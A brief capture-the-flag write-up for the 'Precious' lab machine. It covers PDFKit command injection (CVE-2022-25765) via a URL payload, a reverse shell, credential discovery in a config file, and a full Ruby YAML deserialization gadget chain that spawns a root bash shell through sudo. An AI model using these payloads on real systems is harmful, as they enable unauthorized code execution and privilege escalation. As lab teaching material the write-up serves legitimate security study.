Precious

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Homepage:
http://precious.htb/

Seems you put in a url and it converts the URL to a PDF:
Created a test page and entered the url:

Initial Foothold

Downloaded an looked at metadata:

PDFKit Vulns
https://nvd.nist.gov/vuln/detail/CVE-2022-25765

https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

Putting in http://10.10.14.36/?name=%20id

/etc/passwd

Lookis like python3 is installed. Checked for nc, php, python, no luck

Reverse shell with python3:

Henry’s password found in
/home/ruby/.bundle/config

User.txt Proof Screenshot

##

Privilege Escalation

Sudo -l

Seems like it is a version check using yaml:

Found a yaml deserialization attack:
https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file- ruby_yaml_load_sploit2-yaml
Copied contents of ruby_yaml_load_sploit2.yaml in dependencies.yml and executed

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: /bin/bash
         method_id: :resolve

Executed bash shell as root

RootScreenshot Here: